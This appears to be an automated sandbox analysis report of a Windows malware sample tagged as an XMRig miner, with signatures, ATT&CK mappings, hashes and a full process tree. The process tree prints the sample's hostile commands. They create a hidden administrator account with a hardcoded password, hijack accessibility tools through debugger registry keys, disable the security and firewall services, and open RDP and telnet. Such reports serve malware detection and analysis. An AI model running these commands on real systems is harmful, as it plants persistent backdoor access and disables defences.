Analysis
-
max time kernel
135s -
max time network
175s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
11-08-2020 12:30
General
-
Target
foo/bc6536b86b04cf5b3bf7cd353d615ab9.exe
Score
10/10
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Creates new service(s) 1 TTPs
-
Executes dropped EXE 1 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Modifies file permissions 1 TTPs 2 IoCs
-
Modifies WinLogon 2 TTPs 13 IoCs
-
Drops file in System32 directory 6 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 2 IoCs
-
Runs net.exe
-
Suspicious behavior: LoadsDriver 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"C:\Users\Admin\AppData\Local\Temp\foo\bc6536b86b04cf5b3bf7cd353d615ab9.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foo\U.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\net.exenet user ontar /DELETE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar /DELETE4⤵
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Администраторы ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Администраторы ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrateurs ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrateurs ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilisateurs du Bureau а distance" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilisateurs du Bureau а distance" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop-gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop-gebruikers" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Beheerders ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Beheerders ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop gebruikers" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop gebruikers" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "??????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup ??? ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup ??? ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "??????????????" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "??????????????" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorzy ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorzy ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratorer ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Brukere av eksternt skrivebord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Brukere av eksternt skrivebord" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios Remote Desktop" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios Remote Desktop" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup gli amministratori ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup gli amministratori ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup administratorer ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup administratorer ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Anvandare av fjarrskrivbord" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Anvandare av fjarrskrivbord" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "RemoteDesktopBenutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "RemoteDesktopBenutzer" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administratoren ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administratoren ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Benutzer" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Benutzer" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utilizadores do ambiente de trabalho remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Utenti desktop remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Utenti desktop remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administradores ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administradores ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup yoneticileri ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup yoneticileri ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzak masaustu kullan?c?lar?" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzak masaustu kullan?c?lar?" ontar /add4⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no4⤵
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpassistant /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\chcp.comchcp 12513⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SYSTEМ /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Аdministrator /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Aдминистратор /t REG_DWORD /d "00000000" /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPLifeInterval /t REG_DWORD /d "00005180" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SFCDisable /t REG_DWORD /d "FFFFFF9D" /f3⤵
-
C:\Windows\SysWOW64\sc.exesc config rasman start= auto3⤵
-
C:\Windows\SysWOW64\sc.exesc config remoteaccess start= auto3⤵
-
C:\Windows\SysWOW64\net.exenet start rasman3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rasman4⤵
-
C:\Windows\SysWOW64\net.exenet start remoteaccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start remoteaccess4⤵
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wscsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SharedAccess3⤵
-
C:\Windows\SysWOW64\sc.exesc create tlntsvr binPath= tlntsvr.exe3⤵
-
C:\Windows\SysWOW64\sc.exesc config tlntsvr start= auto3⤵
-
C:\Windows\SysWOW64\net.exenet start tlntsvr3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start tlntsvr4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 3389 system3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening TCP 4899 system3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s "C:\Documents and settings\ontar" /S /D3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
C:\Windows\SysWOW64\net.exenet user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators ontar /add4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="3⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value4⤵
-
C:\Windows\SysWOW64\find.exeFind "="4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" ontar /add3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add4⤵
-
C:\Windows\SysWOW64\net.exenet accounts /forcelogoff:no /maxpwage:unlimited3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d 0x0 /f3⤵
- Modifies WinLogon
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg.exe add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg.rkr" /t REG_BINARY /d "1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000" /f3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib C:\users\ontar +r +a +s +h3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exereg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList» /v ontar /t REG_DWORD /d «00000000" /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\foo\SH.bat" "2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -h -s -r C:\Windows\system32\dllcache3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\System32\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\takeown.exetakeown /F C:\Windows\SysWOW64\sethc.exe3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\dllcache\sethc.exe /G :F SYSTEM:F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f3⤵
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe"C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe" -silent2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s SstpSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s RasMan1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s RasMan1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Account Manipulation
1New Service
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Hidden Files and Directories
2Winlogon Helper DLL
1Defense Evasion
Modify Registry
2Hidden Files and Directories
2Impair Defenses
1File Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\foo\SH.batMD5
21ef54fce2b94d13c5c8bc294fbc5e11
SHA157a38e4649b34e4bb36b778c17de0804ac418132
SHA256896fe05ecf0c6826cb5265a43118fc242ecc7a5457e487a0976a73c514a4a16d
SHA5122f539290cb27bd88cdf73e976a9a77de951cdc2f428669bc472470cf9775f7c3e4c351e5eabdafeef074954fdd8efe61096a09dc1f1a2ee4ba72426e263378c7
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exeMD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
SHA2568c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8
SHA5120bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f
-
C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exeMD5
c558680a720c1e3a317ae3ee9e4bdfda
SHA1a23b18726297c80b89e3de588666d116920c8f10
SHA2568c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8
SHA5120bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f
-
C:\Users\Admin\AppData\Local\Temp\foo\U.batMD5
1fae59414d8f21e40d105f47f6b23edd
SHA1c157832a5322d53130fa1e568abf7b66e2ae87cc
SHA256d58f99d63f3306ccc68130af6cd7e539198e26b0ce2cb647b3ac710b974cec7e
SHA512c579e56e3f449bcfc50c9d32f85bb55a0e2fd34d54146654188c38f7c2af529a04c9471afab10bf1c529cae9ef0c185a8712cf626c8c84a306dc3758dc29b538
-
C:\Users\Admin\AppData\Local\Temp\foo\prop.exeMD5
48522d32f014350cb5b8d55ca8b52678
SHA14b84fedea40c4db502427cbc9e0ceffb18bf7033
SHA2567b0fd59157936cbaa2fe204fba06b22f11bfc5373aa7ea918a5c0e42035094bd
SHA51205bddf16831b456a66936af181bac73e23131e2d0698db0d1a93b51c60fdaedff1a389e6adf3cb619921211147ce54ca6c5be25dab4c79169e914dcc0b2a50ae
-
C:\Windows\INF\netrasa.PNFMD5
80648b43d233468718d717d10187b68d
SHA1a1736e8f0e408ce705722ce097d1adb24ebffc45
SHA2568ab9a39457507e405ade5ef9d723e0f89bc46d8d8b33d354b00d95847f098380
SHA512eec0ac7e7abcf87b3f0f4522b0dd95c658327afb866ceecff3c9ff0812a521201d729dd71d43f3ac46536f8435d4a49ac157b6282077c7c1940a6668f3b3aea9
-
C:\Windows\INF\netsstpa.PNFMD5
01e21456e8000bab92907eec3b3aeea9
SHA139b34fe438352f7b095e24c89968fca48b8ce11c
SHA25635ad0403fdef3fce3ef5cd311c72fef2a95a317297a53c02735cda4bd6e0c74f
SHA5129d5153450e8fe3f51f20472bae4a2ab2fed43fad61a89b04a70325559f6ffed935dd72212671cc6cfc0288458d359bc71567f0d9af8e5770d696adc5bdadd7ec
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/60-14-0x0000000000000000-mapping.dmp
-
memory/404-69-0x0000000000000000-mapping.dmp
-
memory/484-134-0x0000000000000000-mapping.dmp
-
memory/488-76-0x0000000000000000-mapping.dmp
-
memory/492-133-0x0000000000000000-mapping.dmp
-
memory/500-39-0x0000000000000000-mapping.dmp
-
memory/504-36-0x0000000000000000-mapping.dmp
-
memory/568-150-0x0000000000000000-mapping.dmp
-
memory/572-31-0x0000000000000000-mapping.dmp
-
memory/684-115-0x0000000000000000-mapping.dmp
-
memory/736-102-0x0000000000000000-mapping.dmp
-
memory/744-101-0x0000000000000000-mapping.dmp
-
memory/796-96-0x0000000000000000-mapping.dmp
-
memory/804-35-0x0000000000000000-mapping.dmp
-
memory/848-93-0x0000000000000000-mapping.dmp
-
memory/852-92-0x0000000000000000-mapping.dmp
-
memory/892-142-0x0000000000000000-mapping.dmp
-
memory/924-86-0x0000000000000000-mapping.dmp
-
memory/1016-87-0x0000000000000000-mapping.dmp
-
memory/1036-131-0x0000000000000000-mapping.dmp
-
